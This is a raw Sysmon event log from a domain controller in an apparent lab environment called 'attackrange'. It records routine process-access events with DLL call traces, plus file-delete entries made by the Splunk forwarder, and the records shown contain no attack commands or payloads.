C:\Users\Administrator\ATTACKRANGE\Administrator{266CAFBE-64C3-6064-2804-0B0000000000}0xb04282HighMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{266CAFBE-64C5-6064-A500-00000000AE01}4356C:\Windows\explorer.exeC:\Windows\Explorer.EXE /NOUACCHECK 10341000x800000000000000011298Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011297Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.594{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011296Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+925b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+650d|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+
49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011295Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+658c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64d9|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae 10341000x800000000000000011294Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.594{266CAFBE-64C5-6064-A500-00000000AE01}43565400C:\Windows\Explorer.EXE{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+892c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+64ad|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+1e1c|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+2759|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+513dc|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4de0f|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+4a506|C:\Windows\System32\combase.dll+49cba|C:\Windows\System32\USER32.dll+121e4|C:\Windows\System32\USER32.dll+11b2c|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+5be0|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+635e|C:\Windows\System32\windows.immersiveshell.serviceprovider.dll+c6ae|C:\Windows\System32\KERNEL32.DLL+84d4 10341000x800000000000000011293Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.578{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011292Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.578{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3300-00000000AE01}2520C:\Windows\system32\svchost.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x800000000000000011291Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.422{266CAFBE-64FC-6064-1001-00000000AE01}6660NT 
AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BB7A1396B7E5B9A1EA7E37A40CC4ED96,SHA256=83378F0B7D4E68D89507A9FF623B389BDEDE4ABCBDDE2D0822B7CEBD83097AB5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011290Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.422{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1894F7AAFE4F1F9AA8F6DC93D02D3F71,SHA256=40BB6FBFCB68B8FA35DCDC0F2DBDEC66F9CA1FB8776E0DB62C0877A868982778,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011289Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combas
e.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011288Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011287Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011286Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+1a962|C:\Windows\system32\windows.cortana.onecore.dll+16e12|C:\Windows\system32\windows.cortana.onecore.dll+16d5b|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011285Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49246044C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011284Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.078{266CAFBE-64C4-6064-9B00-00000000AE01}49245412C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.onecore.dll+1a8c3|C:\Windows\system32\windows.cortana.onecore.dll+6198|C:\Windows\system32\windows.cortana.onecore.dll+16cb1|C:\Windows\system32\windows.cortana.onecore.dll+1537|C:\Windows\system32\windows.cortana.onecore.dll+4a2d|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e 10341000x800000000000000011283Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.062{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41968|C:\Windows\system32\windows.cortana.Desktop.dll+26297|C:\Windows\system32\windows.cortana.Desktop.dll+214fb|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 10341000x800000000000000011282Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:04.062{266CAFBE-64C4-6064-9B00-00000000AE01}49246092C:\Windows\System32\RuntimeBroker.exe{266CAFBE-64D4-6064-B700-00000000AE01}5704C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\System32\RPCRT4.dll+4ab4f|C:\Windows\System32\combase.dll+4e28b|C:\Windows\system32\windows.cortana.Desktop.dll+418c2|C:\Windows\system32\windows.cortana.Desktop.dll+41680|C:\Windows\system32\windows.cortana.Desktop.dll+92dc|C:\Windows\system32\windows.cortana.Desktop.dll+21491|C:\Windows\system32\windows.cortana.Desktop.dll+15c7|C:\Windows\system32\windows.cortana.Desktop.dll+44bd|C:\Windows\System32\combase.dll+9adba|C:\Windows\System32\combase.dll+91b7d|C:\Windows\System32\RuntimeBroker.exe+12d1|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+5fee9|C:\Windows\System32\combase.dll+277f|C:\Windows\System32\combase.dll+513e3|C:\Windows\System32\combase.dll+51092|C:\Windows\System32\combase.dll+4f9a8|C:\Windows\System32\combase.dll+4d72d|C:\Windows\System32\combase.dll+4ce0f|C:\Windows\System32\combase.dll+685e9|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d 23542300x800000000000000011343Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:05.515{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D14E00BEC799A07A8AB7BFA4098D7C5,SHA256=6D23379380BA08694386AF0D7834D6AB8E2C47422D4BCF67E6E6DCAAD29F250B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000011354Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.547{266CAFBE-64FC-6064-1001-00000000AE01}6660NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 
Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=23F5341F8D9E91F08C244CD9EE56BA81,SHA256=F0E45622534932D22F0A09E7D191489A4C6F28D65A056A9926A465462556C897,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000011353Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.484{266CAFBE-669E-6064-7E01-00000000AE01}48683816C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe{266CAFBE-64ED-6064-D500-00000000AE01}5648C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e675|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+55e1a6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011352Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-64EE-6064-D900-00000000AE01}53082340C:\Windows\system32\conhost.exe{266CAFBE-669E-6064-7E01-00000000AE01}4868C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011351Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011350Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 12:10:06.328{266CAFBE-646C-6064-0C00-00000000AE01}5921104C:\Windows\system32\svchost.exe{266CAFBE-647D-6064-3400-00000000AE01}2760C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x800000000000000011349Microsoft-Windows-Sysmon/Operationalwin-dc-892.attackrange.local-2021-03-31 
